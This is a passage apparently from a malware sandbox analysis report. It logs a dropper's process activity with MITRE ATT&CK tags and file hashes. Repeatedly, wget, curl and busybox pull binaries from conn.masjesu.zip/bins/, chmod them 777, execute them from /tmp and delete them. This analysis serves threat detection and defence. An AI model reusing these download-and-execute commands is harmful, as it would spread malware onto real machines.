  - /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt (PID 983): ./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [Executes dropped EXE]
  - /bin/rm (PID 984): rm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt
  - /usr/bin/wget (PID 985): wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [System Network Configuration Discovery]
  - /usr/bin/curl (PID 986): curl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 988): /bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [System Network Configuration Discovery]
  - /bin/chmod (PID 989): chmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [File and Directory Permissions Modification]
  - /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT (PID 990): ./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [Executes dropped EXE]
  - /bin/rm (PID 991): rm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT
  - /usr/bin/wget (PID 992): wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [System Network Configuration Discovery]
  - /usr/bin/curl (PID 993): curl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 995): /bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [System Network Configuration Discovery]
  - /bin/chmod (PID 996): chmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [File and Directory Permissions Modification]
  - /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW (PID 997): ./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [Executes dropped EXE]
  - /bin/rm (PID 998): rm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW
  - /usr/bin/wget (PID 999): wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr
  - /usr/bin/curl (PID 1000): curl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 1002): /bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [System Network Configuration Discovery]
  - /bin/chmod (PID 1003): chmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [File and Directory Permissions Modification]
  - /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr (PID 1004): ./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [Executes dropped EXE]
  - /bin/rm (PID 1005): rm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr
  - /usr/bin/wget (PID 1006): wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
  - /usr/bin/curl (PID 1007): curl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 1009): /bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
  - /bin/chmod (PID 1010): chmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [File and Directory Permissions Modification]
  - /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 (PID 1011): ./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [Executes dropped EXE]
  - /bin/rm (PID 1012): rm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97